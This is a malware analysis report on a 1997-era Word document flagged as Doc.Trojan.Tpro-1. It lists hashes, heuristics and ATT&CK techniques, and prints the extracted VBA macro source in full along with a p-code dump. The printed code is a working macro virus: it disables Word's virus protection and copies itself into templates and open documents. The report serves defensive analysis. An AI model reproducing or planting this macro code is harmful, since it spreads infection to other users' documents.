Office (OLE) malware analysis — malicious · 3367919c1ac67c9c

MALICIOUS

Office (OLE)

38.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a8307c37d4266acf62e4a69643a439a1 SHA-1: b8ec239538c9ca25baf78e942a2e5faf67ee7fa8 SHA-256: 3367919c1ac67c9ccb4f68b74eeded4e5d2a836f7341edf7e468a3ccb0c9a14c

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV and contains critical AutoOpen and AutoClose VBA macros. The AutoClose macro explicitly disables virus protection. The AutoOpen macro attempts to modify application templates, potentially to establish persistence or distribute further malware, by exporting and importing a VBA module to a specific path. The exact payload or ultimate goal is unclear due to truncation, but the techniques indicate a downloader or dropper.

Heuristics 5

ClamAV: Doc.Trojan.Tpro-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Tpro-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7402 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7402 bytes
SHA-256: `d66e52110302777029a73ff72d7049dde03ee0ad36d73ef3431dd848e0151537`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoClose() Application.Options.VirusProtection = False End Sub Sub AutoOpen() On Error GoTo ErrorCL Const aLin As Long = 73 Dim aTemp As Variant Dim aTName As String Dim aTPro As Variant Dim aPro As Variant Dim aName As String Dim aDoc As Variant Dim aCodeLin As Long Dim aTCodeLin As Long With Application.Options .VirusProtection = False .SaveInterval = 1 End With 'D--N For Each aTemp In Application.Templates With aTemp.VBProject aTName = .VBComponents(1).Name aTCodeLin = .VBComponents("Module1").CodeModule.CountOfLines If aTCodeLin <> aLin Then For Each aTPro In .VBComponents If aTPro.Name <> aTName Then .VBComponents.Remove (aTPro) End If Next aTPro ActiveDocument.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas") .VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas") aTemp.Save .VBComponents(1).Name = "ThisDocuments" End If End With Next aTemp 'N--D For Each aDoc In Application.Documents With aDoc.VBProject aName = .VBComponents(1).Name aCodeLin = .VBComponents("Module1").CodeModule.CountOfLines If aCodeLin <> aLin Then For Each aPro In .VBComponents If aPro.Name <> aName Then .VBComponents.Remove (aPro) End If Next aPro .VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas") Application.ActiveDocument.Save End If End With Next aDoc Exit Sub ErrorCL: Select Case Err.Number Case 53 'There is Not Basic.bas Application.NormalTemplate.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas") Resume Case -2147352565 aCodeLin = 0 Resume Next End Select End Sub ' Processing file: /opt/analyzer/scan_staging/27ebbe4f46774e1594d8272c72704274.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1120 bytes ' Macros/VBA/Module1 - 3906 bytes ' Line #0: ' FuncDefn (Sub AutoClose()) ' Line #1: ' LitVarSpecial (False) ' Ld Application ' MemLd Options ' MemSt VirusProtection ' Line #2: ' EndSub ' Line #3: ' FuncDefn (Sub AutoOpen()) ' Line #4: ' OnError ErrorCL ' Line #5: ' Line #6: ' Dim (Const) ' LitDI2 0x0049 ' VarDefn aLin (As Long) ' Line #7: ' Line #8: ' Dim ' VarDefn aTemp (As Variant) ' Line #9: ' Dim ' VarDefn aTName (As String) ' Line #10: ' Dim ' VarDefn aTPro (As Variant) ' Line #11: ' Dim ' VarDefn aPro (As Variant) ' Line #12: ' Dim ' VarDefn aName (As String) ' Line #13: ' Dim ' VarDefn aDoc (As Variant) ' Line #14: ' Dim ' VarDefn aCodeLin (As Long) ' Line #15: ' Dim ' VarDefn aTCodeLin (As Long) ' Line #16: ' Line #17: ' StartWithExpr ' Ld Application ' MemLd Options ' With ' Line #18: ' LitVarSpecial (False) ' MemStWith VirusProtection ' Line #19: ' LitDI2 0x0001 ' MemStWith SaveInterval ' Line #20: ' EndWith ' Line #21: ' Line #22: ' QuoteRem 0x0005 0x0004 "D--N" ' Line #23: ' StartForVariable ' Ld aTemp ' EndForVariable ' Ld Application ' MemLd Templates ' ForEach ' Line #24: ' StartWithExpr ' Ld aTemp ' MemLd VBProject ' With ' Line #25: ' LitDI2 0x0001 ' ArgsMe ... (truncated)

SHA-256: d66e52110302777029a73ff72d7049dde03ee0ad36d73ef3431dd848e0151537

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoClose()
    Application.Options.VirusProtection = False
End Sub
Sub AutoOpen()
    On Error GoTo ErrorCL
    
    Const aLin As Long = 73

    Dim aTemp As Variant
    Dim aTName As String
    Dim aTPro As Variant
    Dim aPro As Variant
    Dim aName As String
    Dim aDoc As Variant
    Dim aCodeLin As Long
    Dim aTCodeLin As Long
    
    With Application.Options
        .VirusProtection = False
        .SaveInterval = 1
    End With
    
     'D--N
    For Each aTemp In Application.Templates
        With aTemp.VBProject
            aTName = .VBComponents(1).Name
            aTCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
            If aTCodeLin <> aLin Then
                For Each aTPro In .VBComponents
                    If aTPro.Name <> aTName Then
                        .VBComponents.Remove (aTPro)
                    End If
                Next aTPro
                ActiveDocument.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
                .VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
                aTemp.Save
                .VBComponents(1).Name = "ThisDocuments"
            End If
        End With
    Next aTemp
    
     'N--D
    For Each aDoc In Application.Documents
        With aDoc.VBProject
            aName = .VBComponents(1).Name
            aCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
            If aCodeLin <> aLin Then
                For Each aPro In .VBComponents
                    If aPro.Name <> aName Then
                        .VBComponents.Remove (aPro)
                    End If
                Next aPro
                .VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
                Application.ActiveDocument.Save
            End If
        End With
    Next aDoc
    
    Exit Sub
    
ErrorCL:
    Select Case Err.Number
        Case 53   'There is Not Basic.bas
            Application.NormalTemplate.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
            Resume
        Case -2147352565
            aCodeLin = 0
            Resume Next
    End Select
End Sub




' Processing file: /opt/analyzer/scan_staging/27ebbe4f46774e1594d8272c72704274.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Module1 - 3906 bytes
' Line #0:
' 	FuncDefn (Sub AutoClose())
' Line #1:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemLd Options 
' 	MemSt VirusProtection 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Sub AutoOpen())
' Line #4:
' 	OnError ErrorCL 
' Line #5:
' Line #6:
' 	Dim (Const) 
' 	LitDI2 0x0049 
' 	VarDefn aLin (As Long)
' Line #7:
' Line #8:
' 	Dim 
' 	VarDefn aTemp (As Variant)
' Line #9:
' 	Dim 
' 	VarDefn aTName (As String)
' Line #10:
' 	Dim 
' 	VarDefn aTPro (As Variant)
' Line #11:
' 	Dim 
' 	VarDefn aPro (As Variant)
' Line #12:
' 	Dim 
' 	VarDefn aName (As String)
' Line #13:
' 	Dim 
' 	VarDefn aDoc (As Variant)
' Line #14:
' 	Dim 
' 	VarDefn aCodeLin (As Long)
' Line #15:
' 	Dim 
' 	VarDefn aTCodeLin (As Long)
' Line #16:
' Line #17:
' 	StartWithExpr 
' 	Ld Application 
' 	MemLd Options 
' 	With 
' Line #18:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #19:
' 	LitDI2 0x0001 
' 	MemStWith SaveInterval 
' Line #20:
' 	EndWith 
' Line #21:
' Line #22:
' 	QuoteRem 0x0005 0x0004 "D--N"
' Line #23:
' 	StartForVariable 
' 	Ld aTemp 
' 	EndForVariable 
' 	Ld Application 
' 	MemLd Templates 
' 	ForEach 
' Line #24:
' 	StartWithExpr 
' 	Ld aTemp 
' 	MemLd VBProject 
' 	With 
' Line #25:
' 	LitDI2 0x0001 
' 	ArgsMe
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.